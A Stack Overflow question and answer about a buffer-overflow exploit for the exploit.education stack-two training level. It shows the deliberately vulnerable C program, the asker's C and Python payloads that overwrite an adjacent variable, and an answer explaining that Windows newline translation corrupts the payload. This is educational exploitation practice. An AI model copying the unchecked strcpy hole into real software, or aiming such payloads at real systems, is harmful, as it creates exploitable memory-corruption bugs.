# Same stack overflow exploit written in different languages doesn't give same results

Tags: python, c, stack-overflow, binary-data, exploit

I was writing a stack overflow exploit in C against [stack-two of exploit.education](https://exploit.education/phoenix/stack-two/).
A little modified version of the the stack-two program is as follows:

```c
/*
 * phoenix/stack-two, by https://exploit.education
 * The aim is to change the contents of the changeme variable to 0x0d0a090a
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv) {
    struct {
        char buffer[64];
        volatile int changeme;
    } locals;

    printf("Welcome to stack-two, brought to you by https://exploit.education\n");

    char *ptr = getenv("ExploitEducation");
    if (ptr == NULL) {
        fprintf(stderr, "please set the ExploitEducation environment variable\n");
        exit(1);
    }

    locals.changeme = 0;
    strcpy(locals.buffer, ptr);

    if (locals.changeme == 0x0d0a090a) {
        puts("Well done, you have successfully set changeme to the correct value");
    } else {
        printf("Almost! changeme is currently 0x%08x, we want 0x0d0a090a\n",
            locals.changeme);
    }

    exit(0);
}
```

My exploit is as follows:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef unsigned int u32;

int main() {
    const int size = 100;
    char buffer[size];

    memset(buffer, 0, size);  // Zero out the buffer
    memset(buffer, 'x', 64);  // Add 64 'x' to the buffer

    u32 changeme = 0x0d0a090a;
    memcpy(buffer + 64, &changeme, 4);  // appending 0x0d0a090a to buffer

    // Printing the buffer
    for (int i = 0; i < 68; ++i) {
        printf("%c", buffer[i]);
    }

    // Writing the buffer into a file for testing purpose.
    FILE *fd = fopen("bb.bin", "wb");
    fwrite(buffer, 1, 68, fd);
    fclose(fd);
}
```

Then setting ExploitEducation environment variable as follows:

```
ExploitEducation=$(./a.exe)  # a.exe is the exploit binary
```

This should have worked but when I executed [stack-two](https://exploit.education/phoenix/stack-two/) the output was:

```
Welcome to level 2, brought to you by https://exploit.education
Almost! changeme is currently 0x0d090a0d, we want 0x0d0a090a
```

When I investigated furthur and saw the hexdump of `bb.bin`, it was correct and the exploit should work. 
hexdump of bb.bin is as follows:

```
00000000: 7878 7878 7878 7878 7878 7878 7878 7878  xxxxxxxxxxxxxxxx
00000010: 7878 7878 7878 7878 7878 7878 7878 7878  xxxxxxxxxxxxxxxx
00000020: 7878 7878 7878 7878 7878 7878 7878 7878  xxxxxxxxxxxxxxxx
00000030: 7878 7878 7878 7878 7878 7878 7878 7878  xxxxxxxxxxxxxxxx
00000040: 0a09 0a0d                                ....
```

So, why does the exploit not work? Why does the python version of this exploit (given below) works while the C version does not?

### Working Exploit

I have a working exploit written in python.

```py
import sys

sys.stdout.buffer.write(b"x" * 64 + b"\x0a\x09\x0a\x0d")
```

**EDIT:**
As Lundin suggested, I tried changing
`u32 changeme = 0x0d0a090a;` to `uint8_t changeme[] = { 0x0d, 0x0a, 0x09, 0x0a };`, but it didn't work.
I also tried playing around with the order of bytes and the C language constructs used to lay out the bytes, but nothing worked :(.

Comment: That looks like an endian problem.  Try defining an actual array for your `changeme` bytes, instead of an unsigned 32 bit int..

Comment: stdout isn't in binary mode

Comment: Or, y'know, simply move your int32 bytes around until you get the right answer.   :)

Comment: You appear to be on Windows, which is a little endian system. So you need to flip the order in your `uint8_t` array you say you tried.

Answer (score 1, accepted):

The problem is with line endings. `"\x0d\x0a"` is a Windows-style line ending (`"\r\n"`) and `"\x0a"` is a Linux-style line ending (`"\n"`). C assumes it knows better than you and translates the Linux-style `"\n"` into a Windows-style `"\r\n"`. If you open your `bb.bin` file in `"w"` mode instead of `"wb"` mode, you should see the same thing happening.

The solution, then, is to change `stdout` into binary mode. You can do this by [reopening](https://pubs.opengroup.org/onlinepubs/9699919799/functions/freopen.html) the `stdout` stream with `freopen(NULL,"wb",stdout);`. Just to be safe, you can also avoid `printf` and write to `stdout` directly like `fwrite(buffer,1,68,stdout);`.

As a more general tip, examining the output directly with a utility like `xxd` (like `./a.exe | xxd`) helps you directly look at the output you're actually interested in, instead of accidentally fixing the problem in your debug code like you did here.

Comment: Thank you for answering :). `freopen(NULL, "wb", stdout);` returned `EINVAL` as `errno`. But `setmode(fileno(stdout), O_BINARY)`, as suggested in [this answer](https://stackoverflow.com/a/16888382/18578889), worked.